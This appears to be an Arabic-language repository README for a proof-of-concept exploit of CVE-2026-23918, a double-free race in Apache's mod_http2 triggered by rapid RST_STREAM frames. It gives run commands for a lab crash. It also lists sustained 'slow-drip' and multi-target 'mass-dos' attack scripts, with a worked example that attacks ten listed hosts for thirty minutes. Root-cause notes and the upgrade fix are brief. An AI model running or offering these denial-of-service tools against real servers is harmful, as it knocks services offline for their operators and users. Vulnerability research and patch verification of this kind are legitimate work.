
PoC لثغرة التحرير المزدوج في Apache HTTP/2 (CVE-2026-23918)
CVE-2026-23918 | Apache HTTP Server 2.4.66 | CWE-415: تحرير مزدوج | درجة CVSS 8.8 | أُصلحت في 2.4.67
ثغرة تحرير مزدوج في mod_http2 (h2_mplx.c) تتيح للمهاجمين عن بُعد التسبب في رفض الخدمة (تعطّل عامل/worker) عبر إطارات RST_STREAM سريعة تؤدي إلى حالة سباق بين c1c2_stream_joined() و m_stream_cleanup().
# 1. Start the lab
docker-compose up --build -d
# 2. Run the PoC
pip3 install h2
python3 poc.py --target 127.0.0.1 --port 8443
# 3. Watch the crash
docker logs -f apache-lab
# 4. Clean up
docker-compose down -v
النتيجة: يتعطل الخادم خلال ~30 ثانية إلى 3 دقائق بإشارة
SIGSEGV— تم تأكيد رفض الخدمة بشكل موثوق.
| الملف | الوصف |
|---|---|
poc.py | Rapid-RST — هجوم سريع، يعطّل الخوادم خلال 30 ثانية إلى 3 دقائق |
exploits/slow-drip.py | Slow Drip — هجوم مستمر منخفض النطاق الترددي |
exploits/mass-dos.py | Mass DoS — رفض خدمة مستمر متعدد الأهداف |
# Create target list
echo "192.168.1.100:8443" > targets.txt
echo "10.0.0.50:8443" >> targets.txt
# Attack 10 targets for 30 minutes
python3 exploits/mass-dos.py --targets targets.txt --duration 30 --workers 50 --intensity 7
تحدث الثغرة عندما:
c1c2_stream_joined() و m_stream_cleanup() في الوقت نفسهm->spurge دون إزالة التكرارh2_purge_then_destroy() بتدمير الدفق مرتين → تحرير مزدوج → segfault
قم بالترقية إلى Apache 2.4.67 أو أحدث.
تحليل كامل للثغرة، شرح تفصيلي للسبب الجذري، ملاحظات حول الاستغلال، وإرشادات المعالجة: → rhasan.com/CVE-2026-23918
⭐ امنح هذا المستودع نجمة إذا وجدته مفيدًا!